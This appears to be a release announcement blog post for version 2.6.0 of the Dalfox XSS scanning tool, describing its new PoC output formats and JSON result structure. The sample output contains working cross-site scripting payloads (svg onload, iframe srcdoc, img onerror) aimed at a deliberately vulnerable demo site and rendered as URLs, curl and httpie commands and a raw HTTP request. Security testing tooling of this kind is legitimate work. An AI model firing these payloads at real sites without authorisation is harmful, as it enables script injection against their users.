⌘

Dalfox 2.6 Released 🎉

hahwul

Wow! Dalfox 2.6.0 has finally been released! This time, I improved the focus on Result and PoC object. and a new global flag called –poc-type was added. Let’s play it quickly 😎

https://github.com/hahwul/dalfox/releases/tag/v2.6.0

Release note

  • Improve scanning performance
  • Improve result and poc object, printing methods
    • Object (when use in the code, when use in the server mode and json result)
      • Added InjectType
      • Added PoCType
      • Added Method
      • Added Param
      • Added Payload
      • Added Evidence
      • Added CWE
    • Printing
      • All PoC outputs now have a common output logic based on the above objects.
  • New flag (–poc-type)
    • curl
    • httpie
    • http-request
  • And Fixed bug :D

New flag - PocType

–poc-type=plain or not set

This is the basic output you’ve seen for a long time.

dalfox url {target}
...

[V] Triggered XSS Payload (found DOM Object): artist='"><svg/class=dalfox onload=&#97&#108&#101&#114&#00116&#40&#41&#x2f&#x2f
    48 line:  syntax to use near ''"><svg/class=dalfox onload=&#97&#108&#101&#114&#00116&#40&#
[POC][V][GET][inHTML-URL] http://testphp.vulnweb.com/listproducts.php?artist=123%27%22%3E%3Csvg%2Fclass%3Ddalfox+onload%3D%26%2397%26%23108%26%23101%26%23114%26%2300116%26%2340%26%2341%26%23x2f%26%23x2f

–poc-type=curl

You can print it out with the curl command.

dalfox url {target} --poc-type=curl
...

[V] Triggered XSS Payload (found DOM Object): cat="><SvG/onload=alert(1) id=dalfox>
    48 line:  syntax to use near '"><SvG/onload=alert(1) id=dalfox>' at line 1
[POC][V][GET][inHTML-URL] curl -i -k http://testphp.vulnweb.com/listproducts.php?artist=123&cat=%22%3E%3CSvG%2Fonload%3Dalert%281%29+id%3Ddalfox%3E

–poc-type=httpie

You can print it out with the httpie command.

dalfox url {target} --poc-type=httpie
...

[V] Triggered XSS Payload (found DOM Object): cat=<iframe srcdoc="<input onauxclick=alert(1)>" class=dalfox></iframe>
    48 line:  yntax to use near '=<iframe srcdoc="<input onauxclick=alert(1)>" class=dalfox></
[POC][V][GET][inHTML-none(1)-URL] http http://testphp.vulnweb.com/listproducts.php?artist=123&cat=%3Ciframe+srcdoc%3D%22%3Cinput+onauxclick%3Dalert%281%29%3E%22+class%3Ddalfox%3E%3C%2Fiframe%3E --verify=false

–poc-type=http-request

You can view the HTTP Raw Request. This can be easier to analyze because it leaves detailed information.

dalfox url {target} --poc-type=http-request

[V] Triggered XSS Payload (found DOM Object): artist='><img/src/onerror=.1|alert`` class=dalfox>
    48 line:  syntax to use near ''><img/src/onerror=.1|alert`` class=dalfox>' at line 1
[POC][V][GET][inHTML-URL] HTTP RAW REQUEST
GET /listproducts.php?artist=123%27%3E%3Cimg%2Fsrc%2Fonerror%3D.1%7Calert%60%60+class%3Ddalfox%3E HTTP/1.1
Host: testphp.vulnweb.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip

Objects and JSON

PoC Struct and Description

type PoC struct {
	Type       string `json:"type"`
	InjectType string `json:"inject_type"`
	PoCType    string `json:"poc_type"`
	Method     string `json:"method"`
	Data       string `json:"data"`
	Param      string `json:"param"`
	Payload    string `json:"payload"`
	Evidence   string `json:"evidence"`
	CWE        string `json:"cwe"`
}
Key Description List
type Type - G (Grep)
- R (Reflected)
- V (Verified)
inject_type Injected point - inHTML-none (Injected in HTML area)
- inJS-none (Injected in Javascript area)
- inJS-double (Injected within " in Javascript area)
- inJS-single (Injected within ' in Javascript area)
- inJS-backtick (Injected within backtic1k in Javascript area)
- inATTR-none (Injected within in Tag attribute area)
- inATTR-double (Injected within " in Tag attribute area)
- inATTR-single (Injected within ' in Tag attribute area)
poc_type Type of poc code - plain (URL)
- curl (Curl command)
- httpie (HTTPie command)
method HTTP Method - GET/POST/PUT/DELETE, etc…
data PoC (URL) - PoC URL
param Parameter name - Weak parameter name
payload Paramter value - Attack code in value
evidence Evidence with repsonse body - Simple codeview of where it’s injected in response body.
cwe CWE ID - Mapping CWE ID

JSON Format and Example

{
      "type":"Type of PoC (G/R/V)",
      "inject_type":"Injected Point",
      "poc_type":"plain/curl/httpie/etc...",
      "method":"HTTP Method",
      "data":"PoC URL",
      "param":"Parmeter",
      "payload":"Attack Value",
      "evidence":"Evidence with response body",
      "cwe":"CWE ID"
   }


{
      "type":"V",
      "inject_type":"inHTML-URL",
      "poc_type":"",
      "method":"GET",
      "data":"<http://testphp.vulnweb.com/listproducts.php?artist=123%27%22%3E%3Ciframe+srcdoc%3D%22%3Cinput+onauxclick%3Dalert%281%29%3E%22+class%3Ddalfox%3E%3C%2Fiframe%3E>",
      "param":"artist",
      "payload":"'\\"\\u003e\\u003ciframe srcdoc=\\"\\u003cinput onauxclick=alert(1)\\u003e\\" class=dalfox\\u003e\\u003c/iframe\\u003e",
      "evidence":"48 line:  syntax to use near ''\\"\\u003e\\u003ciframe srcdoc=\\"\\u003cinput onauxclick=alert(1)\\u003e\\" class=dalfox",
      "cwe":"CWE-79"
   }

#security